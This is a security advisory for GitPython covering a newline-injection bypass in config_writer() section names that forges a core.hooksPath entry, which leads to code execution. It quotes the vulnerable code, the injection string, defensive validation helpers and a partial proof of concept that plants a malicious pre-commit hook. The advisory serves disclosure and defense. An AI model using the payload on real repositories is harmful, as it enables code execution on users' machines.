
GHSA-mv93-w799-cj2w: GitPython: Newline injection in config_writer() section parameter bypasses CVE-2026-42215 patch, enabling RCE via core.hooksPath

May 8, 2026

Summary

The patch for CVE-2026-42215 (GitPython 3.1.49) validates newlines only in the value parameter of set_value(). The section and option parameters are passed to configparser without any newline validation. An attacker who controls the section argument can inject \n to write arbitrary section headers into .git/config, including a forged [core] section with hooksPath pointing to an attacker-controlled directory, leading to RCE when any git hook is triggered.

Details

File: git/config.py — GitPython 3.1.49 (latest patched version)

def set_value(self, section: str, option: str, value) -> "GitConfigParser":
    value_str = self._value_to_string_safe(value)   # only value is validated
    if not self.has_section(section):
        self.add_section(section)                    # section not validated
    super().set(section, option, value_str)          # option not validated
    return self

_write() formats section headers as "[%s]\n" % name. When section = "user]\n[core", this writes [user]\n[core]\n (two valid section headers) into .git/config.
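As an added illustration of the missing check and of a defender-side audit (example code, not GitPython's own), the helpers below validate section and option names before they reach configparser, and scan git-config-style text for a core.hooksPath and for duplicated [core] headers, the footprint of header injection. The names is_safe_key, render_config and audit_hooks_path are hypothetical.

```python
import configparser
import io
import re

# Characters that let a name break out of a configparser header or option line.
_SECTION_FORBIDDEN = ("\n", "\r", "[", "]")
_OPTION_FORBIDDEN = ("\n", "\r", "=", ":", "[")

def is_safe_key(section: str, option: str) -> bool:
    """The check set_value() lacked: validate section and option, not only value."""
    if not section or any(ch in section for ch in _SECTION_FORBIDDEN):
        return False
    if not option or any(ch in option for ch in _OPTION_FORBIDDEN):
        return False
    return True

def render_config(entries) -> str:
    """Write (section, option, value) triples through configparser, rejecting
    any key or value that could inject a line or a section header (hypothetical)."""
    cp = configparser.ConfigParser()
    for section, option, value in entries:
        if not is_safe_key(section, option) or "\n" in value or "\r" in value:
            raise ValueError(f"rejected config entry {section!r}.{option!r}")
        if not cp.has_section(section):
            cp.add_section(section)
        cp.set(section, option, value)
    buf = io.StringIO()
    cp.write(buf)
    return buf.getvalue()

_HEADER = re.compile(r"^\s*\[([^\]]+)\]\s*$")
_KV = re.compile(r"^\s*([^=\s]+)\s*=\s*(.*?)\s*$")

def audit_hooks_path(config_text: str):
    """Scan git-config-style text; return (core.hooksPath or None, number of
    [core] headers). A second [core] header mid-file is what the injection
    leaves behind, and a hooksPath outside the repo's own .git/hooks needs review."""
    section, hooks, core_headers = None, None, 0
    for line in config_text.splitlines():
        m = _HEADER.match(line)
        if m:
            section = m.group(1).strip().lower()
            core_headers += section == "core"
            continue
        m = _KV.match(line)
        if m and section == "core" and m.group(1).lower() == "hookspath":
            hooks = m.group(2)
    return hooks, core_headers
```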

PoC

import git, os, subprocess

repo = git.Repo.init("/tmp/bypass_test")

os.makedirs("/tmp/evil_hooks", exist_ok=True)
with open("/tmp/evil_hooks/pre-commit", "w") as f:
    f.write("#!/bin/sh\nid > /tmp/rce_proof.txt\n")
os.chmod("/tmp/evil_hooks/pre-commit", 0o755)

References

  • github.com/advisories/GHSA-mv93-w799-cj2w
  • github.com/advisories/GHSA-rpm5-65cw-6hj4
  • github.com/gitpython-developers/GitPython
  • github.com/gitpython-developers/GitPython/security/advisories/GHSA-mv93-w799-cj2w


Affected versions

All versions before 3.1.50

Fixed versions

  • 3.1.50

Solution

Upgrade to version 3.1.50 or above.

Impact: 7 (HIGH)

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H


Weakness

  • CWE-20: Improper Input Validation

Source file

pypi/GitPython/GHSA-mv93-w799-cj2w.yml


Page generated Sat, 09 May 2026 00:19:27 +0000.